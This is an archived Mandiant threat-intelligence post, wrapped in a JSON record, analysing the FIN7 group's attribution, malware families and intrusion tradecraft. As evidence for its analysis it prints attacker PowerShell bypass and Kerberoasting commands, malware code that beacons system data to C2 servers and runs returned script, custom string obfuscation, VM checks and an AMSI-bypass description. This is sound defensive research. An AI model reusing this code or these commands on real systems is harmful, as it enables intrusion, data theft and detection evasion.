{
	"id": "1b97e8f4-ce0d-412f-8cd7-fd3d04bc8861",
	"created_at": "2026-04-06T00:08:35.47603Z",
	"updated_at": "2026-04-10T03:35:53.067854Z",
	"deleted_at": null,
	"sha1_hash": "c55324769777bee7344616b11f5823104754d75c",
	"title": "FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7 | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1010599,
	"plain_text": "FIN7 Power Hour: Adversary Archaeology and the Evolution of\r\nFIN7 | Mandiant\r\nBy Mandiant\r\nPublished: 2022-04-04 · Archived: 2026-04-05 21:25:12 UTC\r\nWritten by: Bryce Abdo, Zander Work, Ioana Teaca, Brendan McKeague\r\nRecent public research asserts threat groups sharing overlaps with FIN7 transitioned to targeted ransomware\r\noperations involving REVIL, DARKSIDE, BLACKMATTER, and ALPHV ransomware. With the purported shift\r\nto ransomware operations, Mandiant is publishing our research on the evolution of FIN7 which we haven’t\r\npublicly written about since Mahalo FIN7, published in 2019.\r\nThis blog post draws on organic research from both historical and recent intrusions that Mandiant directly\r\ninvestigated, and describes the process of merging multiple UNC groups into FIN7. This process allowed us to\r\nmerge eight previously suspected UNC groups into FIN7 in January 2022. We also highlight notable shifts in\r\nFIN7 activity over this time, including their use of novel malware, incorporation of new initial access vectors, and\r\nlikely shift in monetization strategies.\r\nFIN7 continued to leverage PowerShell throughout their intrusions, including in a new backdoor called\r\nPOWERPLANT, which FIN7 has continually developed over the last two years. We also identified new\r\nversions of the BIRDWATCH downloader being developed, which are tracked as CROWVIEW and\r\nFOWLGAZE.\r\nFIN7’s initial access techniques have diversified to include software supply chain compromise and the use\r\nof stolen credentials, in addition to their traditional phishing techniques. 
We also observed FIN7 use\r\nPOWERPLANT as their first stage malware instead of LOADOUT and/or GRIFFON in newer intrusions.\r\nData theft extortion or ransomware deployment following FIN7-attributed activity at multiple\r\norganizations, as well as technical overlaps, suggests that FIN7 actors have been associated with various\r\nransomware operations over time.\r\nMandiant is also tracking multiple, notable campaigns as separate UNC groups that we suspect are FIN7,\r\nincluding a “BadUSB” campaign leading to DICELOADER, and multiple phishing campaigns leveraging\r\ncloud marketing platforms leading to BIRDWATCH.\r\nWe first disclosed threat reporting and publicized research on FIN7 in 2017. Since then, we’ve published multiple\r\nblog posts on FIN7 operations, with more extensive content available on Mandiant Advantage. In this blog post,\r\nwe focus on examining the most recent FIN7 intrusion operations, as well as the attribution methodologies that we\r\nused.\r\nThreat Attribution Over Time\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 1 of 27\n\nOur attribution methodology requires multiple layers of overlaps within collected threat data to merge suspected\r\nFIN7 UNC groups into our core FIN7 cluster. Merge evidence is sourced from analysis of attacker infrastructure,\r\nintrusion tradecraft, modus operandi, and how specific code is employed by the groups we research. Rigorous\r\ndocumentation of technical evidence is critical for modern cybercrime attribution, when considering the fluid and\r\nopportunistic nature of cybercriminal operations, as well as individual operators’ narrow allegiances to criminal\r\norganizations. 
It is also common for us to observe multiple threat groups engaging in intrusion operations within\r\nclose temporal proximity, sometimes even using the same access method within hours or minutes of each other.\r\nThis is especially notable in the ransomware ecosystem, where Mandiant has observed individual members shift\r\nteams, and teams migrate between affiliate programs, commonly adopting different TTPs across intrusions\r\ndepending on who they are collaborating with or gaining access from at a given time.\r\nTo date, we suspect 17 additional UNCs of being affiliated with FIN7 with varying levels of confidence; however,\r\nthose groups have not been formally merged into FIN7. Those groups’ activity spans as far back as 2015 and as\r\nrecently as late 2021, across 36 separate intrusions. Eight previously suspected FIN7 UNC groups, active since\r\n2020, have recently been merged into FIN7, confirming the resilience of actors associated with the threat group.\r\n2020 Activity Brief: Heavy on the LOADOUT\r\nFIN7 was active during the spring and summer of 2020, conducting phishing campaigns and attempting to\r\ndistribute LOADOUT and GRIFFON. During that time, five UNC groups were created to track various\r\ncampaigns, which eventually were merged into our new splinter group of FIN7, following merge analysis later in\r\n2021 that expanded our understanding of FIN7. The impacts of related UNC merges for 2020 activity added usage\r\nof code families LOADOUT, TAKEOUT and a BIRDWATCH variant into FIN7.\r\nFigure 1: FIN7 Activity in 2020-2021\r\nLOADOUT is an obfuscated VBScript-based downloader which harvests extensive information from the infected\r\nsystem. The harvested information is then sent to a command-and-control (C2) server. 
C2 server responses for\r\nLOADOUT infections delivered GRIFFON, a JavaScript-based downloader which retrieves additional JavaScript\r\nmodules using HTTP or DNS and executes them in memory.\r\nIn late summer of 2020, FIN7 capped off their busy year with the first observed usage of POWERPLANT.\r\nPOWERPLANT, also referred to as “KillACK”, is a PowerShell-based backdoor with a breadth of capabilities,\r\ninitially delivered following a successful GRIFFON infection in August 2020. Merges involving the usage of\r\nPOWERPLANT into 2021 led us to assess that FIN7 is likely the only operator using POWERPLANT.\r\n2021 Activity Brief: A Shift to POWERPLANT\r\nWe identified an uptick in FIN7-suspected UNC group activity during 2021 across five intrusions, beginning in\r\nApril of 2021. The uptick led us to initiate a deep-dive research effort into FIN7. We also observed FIN7 shift\r\ntheir initial access techniques away from using LOADOUT, GRIFFON or CARBANAK in favor of direct\r\ndeployment of POWERPLANT and BEACON. Specifically, FIN7 used POWERPLANT in all observed\r\nintrusions in 2021. FIN7 also relied on BEACON as a secondary mode of access alongside some POWERPLANT\r\ninfections.\r\nThroughout 2021 we scrutinized a multitude of FIN7-linked UNC groups against our breadth of past FIN7 intelligence\r\nholdings, merging multiple threat clusters along the way. Our research revealed a fusion of older FIN7 intrusion\r\ntradecraft and new FIN7 malware.\r\nPowerShell Archaeology: FIN7 Habits Die Hard\r\nThere is no doubt about it, PowerShell is FIN7’s love language. FIN7 has implemented malware into its offensive\r\noperations using many programming languages; however, during on-system interactions, FIN7’s preference for\r\nboutique PowerShell-based loaders and unique PowerShell commands is dominant.\r\nOur deep dive into prior FIN7 intrusions dating as far back as 2019 bubbled up several long-standing patterns of\r\nunique PowerShell invocations still being used today. 
In the first example, command lines, such as in Figure 2 and\r\nFigure 3, had overall low global prevalence outside of FIN7 and suspected FIN7 UNCs.\r\ncmd.exe /c start %SYSTEMROOT%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noni\r\n-nop -exe bypass -f \u003cREDACTED\u003e/ADMIN$/temp/wO9EBGmDqwdc.ps1\r\nFigure 2: FIN7 PowerShell Execution from 2019\r\ncmd.exe /c start %SYSTEMROOT%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noni\r\n-nop -exe bypass -f \\\\\u003cREDACTED\u003e\\Admin$\\c5k3fsys.3bp.ps1\r\nFigure 3: FIN7 PowerShell Execution from 2021\r\nThe unique aspect in the Figure 2 and Figure 3 commands is the distinct parameters -noni -nop -exe bypass -f, for\r\nlaunching scripts located in Admin shares and installing Windows services. Since 2019, we have observed FIN7\r\nuse command line parameters such as these while interacting with victim systems through backdoor malware such\r\nas CARBANAK. We have since seen a shift of some of these distinct PowerShell commands being initiated\r\nthrough POWERPLANT infections.\r\nSmaller patterns and consistencies across FIN7 intrusions from 2019 and beyond reveal more distinct PowerShell\r\ncommand lines using -ex bypass -f or -ex bypass -file as passed parameters. Although those patterns appear\r\nmodest to hunt for, the combinations have extremely low global prevalence outside of FIN7-associated threat\r\nactivity. For example, the first command line pattern has been seen over 2800 times, all of which were events\r\nattributed to FIN7. 
The second command line pattern has been seen nearly 250 separate times at 10 different\r\nvictims as far back as 2019, all of which were FIN7 attributed commands.\r\npowershell.exe -ex bypass -file C:\\windows\\temp\\fdddu32.ps1\r\nFigure 4: FIN7 PowerShell Execution from 2019\r\npowershell.exe -ex bypass -f c:\\users\\public\\temp\\AC-Win10w-x64.ps1\r\npowershell.exe -ex bypass -f C:\\Users\\Public\\Videos\\AC-Bot-x64.ps1\r\nFigure 5: FIN7 PowerShell Execution from 2020\r\npowershell.exe -ex bypass -f pkit.ps1\r\npowershell.exe -ex bypass -f cube.ps1\r\nFigure 6: FIN7 PowerShell Executions from 2021\r\nIn addition to FIN7’s unique command lines during intrusion operations, we identified long-standing usage of\r\nother PowerShell code families, such as POWERTRASH. POWERTRASH is an in-memory dropper, or loader,\r\nwritten in PowerShell that executes an embedded payload. Observed payloads loaded by FIN7’s POWERTRASH\r\ninclude CARBANAK, DICELOADER, SUPERSOFT, BEACON and PILLOWMINT. POWERTRASH is a\r\nuniquely obfuscated iteration of a shellcode invoker included in the PowerSploit framework available on GitHub.\r\nWith this improved understanding of FIN7 intrusion operations, we assembled our analytical efforts to begin\r\nmerging multiple suspected UNCs into FIN7. As part of this initiative, we identified new FIN7 missions targeting\r\nour customers, including a Managed Defense Rapid Response engagement in 2021.\r\nManaging a Defense\r\nFIN7 has targeted a broad spectrum of organizations in multiple industries, including Software, Consulting,\r\nFinancial Services, Medical Equipment, Cloud Services, Media, Food and Beverage, Transportation, and Utilities.\r\nWe identified over a dozen intrusions attributed to FIN7 since 2020 across our client base. 
The following use case\r\nprofiles recent FIN7 tradecraft during a Mandiant Managed Defense engagement in 2021.\r\nFIN7 From the Trenches\r\nTo obtain initial access during this intrusion, FIN7 used compromised Remote Desktop Protocol (RDP)\r\ncredentials to log in to a target server across two separate days, and initiated two similar Windows process chains\r\n(Figure 7).\r\nrdpinit.exe\r\n ↳ notepad++.exe\r\n ↳ cmd.exe\r\n ↳ powershell.exe\r\n rdpinit.exe\r\n ↳ notepad++.exe\r\n ↳ cmd.exe\r\n ↳ rundll32.exe\r\nFigure 7: Two FIN7 process event chains\r\nFIN7 used established RDP access to eventually install other modes of host control, first by executing PowerShell\r\nreconnaissance scripts, then by executing a TERMITE loader (Figure 8).\r\nRunDll32 TstDll.dll,TstSec 11985756\r\nFigure 8: Command line used to load FIN7 TERMITE\r\nTERMITE is a password-protected shellcode loader which we have observed at least seven distinct threat groups\r\nuse to load BEACON, METASPLOIT, and BUGHATCH shellcodes. 
FIN7 used TERMITE to load and execute a\r\nshellcode stager for Cobalt Strike BEACON in this case.\r\nFollowing secondary access via BEACON, FIN7 began further enumeration using built-in Windows commands as\r\nwell as POWERSPLOIT and Kerberoasting PowerShell modules.\r\ncmd.exe /C net group \"Domain Admins\" /domain\r\ncmd.exe /C quser\r\npowershell.exe -c import-module C:\\Users\\Public\\kerberoast_hex.ps1; Invoke-Kerberoast -OutputFormat HashCat \u003e ha\r\npowershell.exe -ex bypass -c import-module C:\\Users\\Public\\kerberoast_hex.ps1; Invoke-Kerberoast -OutputFormat H\r\npowershell.exe -ex bypass -f pkit.ps1\r\nAfter the initial reconnaissance using RDP and BEACON, FIN7 executed an obfuscated loader for a victim-customized variant of the PowerShell-based backdoor POWERPLANT, providing tertiary access:\r\npowershell.exe -ex bypass -f cube.ps1\r\nFIN7 then attempted to steal credentials and further compromise the victim’s environment with limited success, as\r\nthe client was able to respond and quickly remediate with the advantage of Managed Defense responders.\r\nA unique aspect of this specific intrusion perfectly highlighted the challenges of technical attribution for\r\ncybercriminal threats: Between the two days of FIN7 operations on the victim system, FIN12 was also active on\r\nthe same victim for multiple hours using the same RDP account, but much different infrastructure and tradecraft,\r\nattempting to install BEACON using the WEIRDLOOP in-memory dropper before the intrusion was remediated.\r\nFIN7’s Evasion\r\nAmong FIN7’s historical trademarks were their creative obfuscation and fast development of evasive techniques.\r\nThis is still the case, with FIN7 first stage droppers and downloaders being heavily obfuscated. 
LOADOUT in\r\nparticular, due to its wide distribution in opportunistic campaigns, has been through several iterations meant to\r\nimprove evasion.\r\nThe initial obfuscation mechanism was basic but effective at evading static detections: the malicious code was\r\ninterspersed with random junk code (Figure 9). After a few months of successful campaigning, AV detection\r\nengines improved coverage of the downloader. To get around this, and to send a message, LOADOUT\r\ndeveloper(s) broke up the beacon suspected to be used in detection signatures by simply inserting “FUCKAV” into\r\nthe strings (Figure 8).\r\ndata = \"id=\" \u0026 get_id() \u0026 \"\u0026FUCKAVtype=put\" \u0026 get_computer_info(\"\") \u0026 \"\u0026DomainHosts=\" \u0026 count_domain_hosts() \u0026\r\nresponse = send(panel_url, data)\r\nif response = \"okFUCKAV\" then\r\n js = send(panel_url, \"\")\r\n run_js(js)\r\nend ifFUCKAV\r\nFigure 8: System survey information sent as beacon by LOADOUT\r\nkiki=ado.ReadText\r\n' OE5QAJ2VaFCK F5\r\nDim yiups\r\nyiups = \"UTo\"\r\nWScript.Echo(\" error \")\r\nkok = replace(kiki, \"FUCKAV\", \"\")\r\nulpo = \"12\"\r\naoso = year(\"01/07/12\")\r\nif right(aoso, 2) = ulpo then\r\nexecute(\"WScript.Echo(\"\" file is corrupted \"\"):\" \u0026 kok)\r\nend if\r\n'hello bitchw\r\nFigure 9: LOADOUT obfuscation\r\nIndeed, the developer(s) was correct to be suspicious that these strings were being used for detection. By pivoting\r\non the beacon, we discovered a new, work-in-progress variant of LOADOUT submitted to VirusTotal (MD5:\r\n485b2a920f3b5ae7cfad93a4120ec20d), detected by only one engine (Figure 10). 
Two hours later, a new version\r\nwas submitted (MD5: 012e7b4d6b5cb8d46771852c66c71d6d), this time with the offending PowerShell command\r\nobscured through their custom obfuscation mechanism (Figure 11).\r\n objTS.WriteLine(TextCrypt)\r\n objTS.Close\r\n pwsh_command = \"powershell.exe -executionpolicy bypass -file \" \u0026 FileName \u0026 \".ps1\"\r\n objWSH.Run pwsh_command, 0, True\r\n FSO.DeleteFile FileName \u0026 \".ps1\"\r\nFigure 10: PowerShell command before obfuscation\r\n Text1 = \"/3/3.1/2.1,7/2/2.0/3+4+5/4/2*3,7.0,7/2/2.1/4.0,6/3/3.0/3.0+5/4+5-9/4.1+5/4/3*3,7.0,6\r\n261416272214202710112212232310\"\r\n TextCrypt = Encryption(MakeCryptoText(TextUnShifter(Text1)), False)\r\n pwsh_command = TextCrypt \u0026 FileName \u0026 \".ps1\"\r\n objWSH.Run pwsh_command, 0, True\r\n FSO.DeleteFile FileName \u0026 \".ps1\"\r\nFigure 11: PowerShell command obfuscation\r\nFIN7 actors have historically tested their tools against public repositories to check static detection engine\r\ncoverage. It is likely that in this case, they were testing the strength of their custom obfuscation.\r\nThis new and improved version of LOADOUT emerged five months later. 
It was refactored to add multiple layers\r\nof obfuscation, including interspersed Bible verses as filler text, and string obfuscation through a custom\r\nmechanism (Figure 12).\r\nPrivate Function GetShiftKey()\r\nOn Error Resume Next\r\nSet Key = CreateObject(\"Scripting.Dictionary\")\r\nl = Len(CryptoKey)\r\ni1 = 0\r\n With Key\r\n For i = 1 To l\r\n s = Mid(CryptoKey, i, 1)\r\n n = (Asc(s) Mod 8) + 1\r\n If Not .Exists(n) Then\r\n .Add n, n\r\n i1 = i1 + 1\r\n End If\r\n If i1 = 9 Then Exit For\r\n Next\r\n If i \u003e= l And i1 \u003c 9 Then\r\n For i = 1 + 1 To 8\r\n If Not .Exists(i) Then\r\n .Add i, i\r\n End If\r\n Next\r\n End If\r\n For i = 1 To 8\r\n GetShiftKey = GetShiftKey + .Items()(i)\r\n Next\r\n End With\r\nEnd Function\r\nPrivate Function TextShifter(txt)\r\n Dim nKeys(), out()\r\n Key = GetShiftKey\r\n n = Len(Key)\r\n If n = 0 Then Exit Function\r\n l = Len(txt)\r\n m = -Int(-l / n)\r\n ReDim nKeys(n)\r\n For i = 1 To n\r\n s1 = Mid(Key, i, 1)\r\n For j = 1 To n\r\n s2 = Mid(Key, j, 1)\r\n If s1 \u003e s2 Or (s1 = s2 And j \u003c= i) Then\r\n nKeys(i) = nKeys(i) + 1\r\n End If\r\n Next\r\n Next\r\n ReDim out(n * m)\r\n For i = 1 To Len(txt)\r\n out(nKeys((i - 1) Mod n + 1) * m + (i - 1) \\ n - m + 1) = Mid(txt, i, 1)\r\n Next\r\n TextShifter = Join(out, \"\")\r\nEnd Function\r\nFigure 12: LOADOUT custom string obfuscation\r\nPOWERPLANT: FIN7’s PowerShell Workhorse\r\nFIN7 has leveraged multiple methods of initial and secondary access into victim networks including phishing,\r\ncompromising third-party systems, Atera agent installers, GoToAssist, and RDP. In a recent case, FIN7 actors\r\ncompromised a website that sells digital products and modified multiple download links to point to an Amazon S3\r\nbucket hosting trojanized versions, containing an Atera agent installer. 
This remote management tool was later\r\nused to deploy POWERPLANT to the victim system. This was the first time Mandiant observed FIN7 leverage\r\nsupply chain compromise. FIN7’s time-tested CARBANAK and DICELOADER (also known as Lizar) malware\r\ncontinue to be in use; however, we have noticed FIN7 depend more on the POWERPLANT backdoor during\r\nrecent intrusions.\r\nOur research into POWERPLANT has revealed that it is a vast backdoor framework with a breadth of capabilities,\r\ndepending on which modules are delivered from the C2 server. POWERPLANT backdoors contain internal\r\nversion identifiers within the code. We have identified samples ranging from version “0.012” through “0.028”,\r\nwith examples shown in Table 1.\r\nPOWERPLANT Sample MD5 Version\r\n5a6bbcc1e44d3a612222df5238f5e7a8 0.012\r\n0291df4f7303775225c4044c8f054360 0.016\r\n3803c82c1b2e28e3e6cca3ca73e6cce7 0.019\r\nd1d8902b499b5938404f8cece2918d3d 0.021(TLS1)\r\n833ae560a2347d5daf05d1f670a40c54 0.021b(SVC)\r\nedb1f62230123abf88231fc1a7190b60 0.021c(SVC)\r\nbce9b919fa97e2429d14f255acfb18b4 0.022\r\nb637d33dbb951e7ad7fa198cbc9f78bc 0.025\r\n2cbb015d4c579e464d157faa16994f86 0.028\r\nTable 1: POWERPLANT samples\r\nThe rate of increase in these internal version numbers over time suggests that FIN7 is actively developing\r\nPOWERPLANT (Figure 13). In one engagement, we observed FIN7 deploy incremented versions of\r\nPOWERPLANT with tweaked functionality to targets in the middle of intrusion operations. During that\r\nengagement, versions “0.023” and “0.025” were both used within a 10-minute timeframe. 
Each version we have\r\nidentified implements overall similar functionality with some programmatic improvements and features added\r\nover time.\r\nFigure 13: POWERPLANT version numbers\r\nMandiant also recovered portions of server-side code components from POWERPLANT controllers. Some of\r\nthese components contain clues that hint at the operational security mindfulness of the malware’s developers. Two\r\nsuch examples are FIN7 being aware of researchers investigating their infrastructure, and employing capabilities\r\nto ban target host aspects such as usernames from the panel.\r\ncheck_username\r\ncheck_hostdomain\r\ncheck_hostname\r\ncheck_hosts\r\ncheck_researcher\r\ncheck_desktop\r\nFigure 14: Snippet of functions from POWERPLANT Server Settings\r\n if (res) {\r\n localStorage.setItem('success-add-username', 'success-add-username-to-blacklist');\r\n location.reload();\r\n }\r\n },\r\nFigure 15: Snippet of functions from POWERPLANT Server Settings\r\n /**\r\n * Initialization\r\n */\r\n init() {\r\n this.config();\r\n this.events();\r\n },\r\n \r\n /**\r\n * Configs\r\n */\r\n config() {\r\n this.config = {\r\n window: $(window),\r\n document: $(document),\r\n content: $('#content'),\r\n lastUrl: null,\r\n isPage: true,\r\n isModal: false,\r\n intervalId: null,\r\n timer: null,\r\n selectedBots: []\r\n };\r\n }\r\nFigure 16: Snippet of functions from POWERPLANT Server Configuration\r\nDuring active C2 sessions, POWERPLANT servers will send multiple additional module types as “tasks” for\r\ntarget systems to execute. Two of these modules are EASYLOOK and BOATLAUNCH.\r\nEASYLOOK Module\r\nEASYLOOK is a reconnaissance utility that FIN7 has used since at least 2019. 
EASYLOOK captures a wide\r\nrange of data from infected systems, including operating system version, registration key, system name, username,\r\ndomain information, and hardware specifications.\r\nThe initial version of EASYLOOK was delivered by a GRIFFON C2 server and written in JScript (Figure 18).\r\nFIN7’s updated variation of EASYLOOK was delivered by a POWERPLANT variant C2 server and written in\r\nPowerShell (Figure 17). Both versions implemented the exact same functionality across two code languages,\r\nincluding the typo “bios_versoin”.\r\nfunction is_wm {\r\n $bios = Get-WMIObject Win32_Bios\r\n $SerialNumber = $bios.SerialNumber\r\n $bios_versoin = $bios.SMBIOSBIOSVersion\r\nIf ($SerialNumber.Contains(\"parallels\") -or $SerialNumber.Contains(\"vmware\")) {\r\n return $true\r\n}\r\nIf ($bios_versoin.Contains(\"vmware\") -or $bios_versoin.Contains(\"virtualbox\")) {\r\n return $true\r\n}\r\n return $false\r\n}\r\nFigure 17: VM check from new variant of FIN7 EASYLOOK coded in PowerShell\r\nfunction is_vm () {\r\n var biosRequest = wmi.ExecQuery('SELECT * FROM Win32_BIOS');\r\n var biosItems = new Enumerator(biosRequest);\r\n for (; !biosItems.atEnd(); biosItems.moveNext()) {\r\n var bios_versoin = biosItems.item().SMBIOSBIOSVersion.toLowerCase();\r\n var serial_number = biosItems.item().SerialNumber.toLowerCase();\r\n if(serial_number.indexOf('parallels') \u003e= 0 || serial_number.indexOf('vmware') \u003e= 0) {\r\n return true;\r\n }\r\n if(bios_versoin.indexOf('vmware') \u003e= 0 || bios_versoin.indexOf('virtualbox') \u003e= 0) {\r\n return true;\r\n }\r\n }\r\n return false;\r\n}\r\nFigure 18: VM check from first variant of FIN7 EASYLOOK coded in JavaScript\r\nBOATLAUNCH Module\r\nBOATLAUNCH is a utility sent from FIN7 POWERPLANT controllers that is used as a helper module during\r\nintrusion operations. 
BOATLAUNCH is used to patch PowerShell processes on infected systems to bypass\r\nWindows AntiMalware Scan Interface (AMSI). The malware loops, looking for unpatched PowerShell processes,\r\nand for each unpatched process the malware locates and patches amsi.dll!AmsiScanBuffer with a 5-byte\r\ninstruction sequence to always return S_OK.\r\nThe technique used to patch AMSI is a variation of publicly described common AMSI bypass techniques. Both\r\n32-bit and 64-bit variants of BOATLAUNCH have been observed using the following export directory DLL names\r\n(Table 2).\r\nBOATLAUNCH Bitness Export Directory Name\r\n32-bit amsi32_kill.dll\r\n64-bit amsi64_kill.dll\r\nTable 2: BOATLAUNCH PE Export Directory Names\r\nThe Curious Cases of BIRDWATCH\r\nOur deep dive also revealed usage of BIRDWATCH and its similar variants used by FIN7 and suspected FIN7\r\ngroups such as UNC3381. BIRDWATCH is a .NET-based downloader which retrieves payloads over HTTP,\r\nwriting them to disk and then executing them. BIRDWATCH uploads reconnaissance information from targeted\r\nsystems as well, which includes running processes, software installed, network configuration, web browser\r\ninformation and Active Directory data.\r\nBIRDWATCH is often referred to collectively as “JssLoader”; however, multiple variations of BIRDWATCH\r\nexist which we track as separate code families. One variant of BIRDWATCH is CROWVIEW, which is also .NET-based, but has enough code differences from prototypical BIRDWATCH that we cluster it separately. Unlike\r\nBIRDWATCH, CROWVIEW can house an embedded payload, can self-delete, supports additional arguments and\r\nstores a slightly different configuration.\r\nFIN7 has implemented similar or exact functionality in different programming languages, observed in various\r\ncode families several times over the past few years. 
Similar to EASYLOOK, which has both JScript and\r\nPowerShell variants, BIRDWATCH and CROWVIEW have separate versions implemented in C++. This data\r\npoint of code reuse and overlaps aided our technical attribution throughout multiple UNC merges, when combined\r\nwith additional infrastructure and tradecraft analysis.\r\nIn this first example, programmatic collection of the BIOS (Basic Input Output System) serial number is shown\r\nacross POWERPLANT and CROWVIEW code families.\r\nprivate static string GetBiosSerial()\r\n{\r\n string result = \"BIOS UNKNOWN\";\r\n try\r\n {\r\n ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSear\r\n ManagementObjectCollection managementObjectCollection = managementObjectSear\r\n foreach (ManagementBaseObject managementBaseObject in managementObjectCollec\r\n {\r\n ManagementObject managementObject = (ManagementObject)mana\r\n result = (string)managementObject[\"SerialNumber\"];\r\n }\r\n }\r\n catch\r\n {\r\n }\r\n return result;\r\n}\r\nFigure 19: C# Code Snippet from FIN7-attributed CROWVIEW, a variant of BIRDWATCH\r\nfunction Get-BiosSerial() {\r\n $sn = \"BIOS UNKNOWN\"\r\n $_sn = \"\"\r\n try {\r\n $mSearcher = Get-WmiObject -Query \"SELECT SerialNumber FROM Win32_BIOS\"\r\n foreach ($o in $mSearcher) {\r\n if ($o.Properties.Name -eq \"SerialNumber\") {\r\n $_sn = $o.Properties.Value\r\n }\r\n }\r\n }\r\n catch {}\r\n if ([String]::IsNullOrEmpty($_sn) -eq $false) { $sn = $_sn }\r\n return \"$sn\";\r\n}\r\nFigure 20: PowerShell Code Snippet from FIN7-attributed POWERPLANT\r\nSystem enumeration data formatting overlaps also exist between FOWLGAZE and EASYLOOK. 
Both code\r\nfamilies implement near-identical system surveys, with the shared usage of keys such as “pc_domain”,\r\n“pc_dns_host_name”, “pc_model” and “no_ad”.\r\n{\"host\":\"\u003cHOSTNAME\u003e\", \"domain\": \"\u003cDOMAIN\u003e\", \"user\":\"\u003cUSERNAME\u003e\", \"processes\":\r\n [\u003cPROCESS_LIST\u003e] ,\"desktop_file_list\": [\u003cFILE_LIST\u003e] ,\"adinfo\":\r\n{\"adinformation\":\"no_ad\", \"part_of_domain\":\"no\", \"pc_domain\":\"\",\r\n\"pc_dns_host_name\":\"\", \"pc_model\":\"\"}}\r\nFigure 21: Data Collection JSON Format Snippet of FOWLGAZE(\"JssLoader\")\r\n$result += ('username***' + $env:USERNAME)\r\n $result += ('hostname***' + $env:COMPUTERNAME)\r\n $elevated = $(whoami /groups).Contains(\"12288\")\r\n If ($elevated) {\r\n $result += 'yes'\r\n }\r\n Else {\r\n $result += 'elevated***' + 'no'\r\n }\r\n $ad = get_active_directory_information\r\n if ($ad) {\r\n $result += ('adinformation***' + $ad)\r\n } else {\r\n $result += ('adinformation***no_ad')\r\n }\r\n $csRequest = Get-WmiObject Win32_ComputerSystem\r\n $csRequest.PartOfDomain\r\n If ($csRequest.PartOfDomain) {\r\n $result += ('part_of_domain***yes')\r\n }\r\n else {\r\n $result += ('part_of_domain***no')\r\n }\r\n $result += 'pc_domain***' + $csRequest.Domain\r\n $result += 'pc_dns_host_name***' + $csRequest.DNSHostName\r\n $result += 'pc_model***' + $csRequest.Model\r\nFigure 22: Data Collection Code Snippet of EASYLOOK (Reconnaissance Module)\r\nA final code reuse example is usage of \"theAnswer\", defined as a variable within the program functionality for POST\r\nrequests to C2 controllers in both CROWVIEW and POWERPLANT, as shown in Figure 23 and Figure 24.\r\npublic void Put(string theAnswer)\r\n{\r\n AppHttp.wCli.QueryString.Clear();\r\n AppHttp.wCli.QueryString.Add(\"type\", \"put\");\r\n string text = Convert.ToBase64String(Encoding.ASCII.GetBytes(AppParams.ProgID)).Replace(\"+\", \"\r\n string text2 = 
Convert.ToBase64String(Encoding.ASCII.GetBytes(\"put\")).Replace(\"+\", \"***\");\r\n string body = string.Concat(new string[]\r\n {\r\n \"id^^^\",\r\n text,\r\n \"\u0026type^^^\",\r\n text2,\r\n \"\u0026\",\r\n theAnswer\r\n });\r\n string text3 = this.HttpUpload(AppParams.URL_PutAnswer, body);\r\n}\r\nFigure 23: C# Code Snippet from FIN7-attributed CROWVIEW and BIRDWATCH (JssLoader)\r\nFunction Send-ToConsole([String] $theAnswer) {\r\n if ([String]::IsNullOrEmpty($theAnswer)) { return }\r\n $_rc = \"\"\r\n try {\r\n $_wc = New-Object System.Net.WebClient\r\n $_wc.QueryString.Add(\"id\", $script:myID)\r\n $_wc.Headers.Add(\"Content-type\", \"text/html\")\r\n $_wc.Headers.Add(\"Accept\", \"text/html\")\r\n $_rc = $_wc.UploadString($urlConsole, $theAnswer)\r\nFigure 24: PowerShell Code Snippet from FIN7-attributed POWERPLANT\r\nMalware code usage is sometimes considered a primary data point for some public threat attribution. Code\r\noverlaps by themselves, without sufficient additional data points such as intrusion data and infrastructure, are not\r\nstrong enough for us to fully assess that a UNC group should be merged. Throughout 2021 and well into 2022,\r\nwe have identified and will continue to track multiple newly suspected FIN7 UNCs and their activity moving\r\nforward.\r\nAdditional Recent Activity from Suspected FIN7 UNCs\r\nIn October 2021, Mandiant observed a campaign where actors mailed victim organizations “BadUSB” malicious\r\nUSB devices, primarily targeting U.S.-based organizations. We attribute this campaign to UNC3319, a group\r\nwhich we suspect to be associated with FIN7 with low confidence.\r\nThe USB hardware was programmed to download STONEBOAT, which ultimately installed the DICELOADER\r\nframework on the victim system. STONEBOAT is a previously unseen, .NET-based in-memory dropper which\r\ndecrypts a shellcode payload embedded in it. 
The payload is then mapped into memory and executed.\r\nSTONEBOAT was observed first loading an intermediary loader called DAVESHELL, which then executed the\r\nfinal DICELOADER payload. DAVESHELL is publicly available, open-source code for a launcher of embedded\r\npayloads. DAVESHELL is used by nearly 30 threat groups including FIN12; however, the implementation of\r\nDAVESHELL shellcode loading DICELOADER was unique to a small cluster of threat activity.\r\nAdditionally, we’ve identified multiple phishing campaigns distributing BIRDWATCH that have leveraged\r\ncompromised accounts on various email delivery and marketing platforms, including Maropost, ActiveCampaign,\r\nand Mailjet. We attribute this activity to UNC3381, which is suspected to be FIN7 with low confidence. UNC3381\r\nwas first observed in September 2021, but we’ve identified similar activity leveraging Mailjet dating back to late\r\n2019, suspected to be UNC3381 with high confidence.\r\nThroughout their campaigns, UNC3381 has used nearly identical Quickbooks-themed invoice lures and leveraged\r\nthe branding of the compromised account that they were sent from, providing additional legitimacy for their\r\nphishes. These emails contained a malicious link that goes through the analytics domain associated with the\r\nplatform they were sent from, before redirecting to a page typically hosted on a compromised domain.\r\nFigure 25: UNC3381 Quickbooks-themed phishing email\r\nUNC3381 has used multiple malware families in these campaigns, including WINGNIGHT and FLYHIGH, two\r\ndifferent downloader families which we’ve only observed being used by UNC3381. WINGNIGHT is a WSF-based downloader that utilizes VBScript, and FLYHIGH is a downloader written in C using the Excel XLL SDK,\r\nbut masquerades as using the Excel-DNA framework. 
